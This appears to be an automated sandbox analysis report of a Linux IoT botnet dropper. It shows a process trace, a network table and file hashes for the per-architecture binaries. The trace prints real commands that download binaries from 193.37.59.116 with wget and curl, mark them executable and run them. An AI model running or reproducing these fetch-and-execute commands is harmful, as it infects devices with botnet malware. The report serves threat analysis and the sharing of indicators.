[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea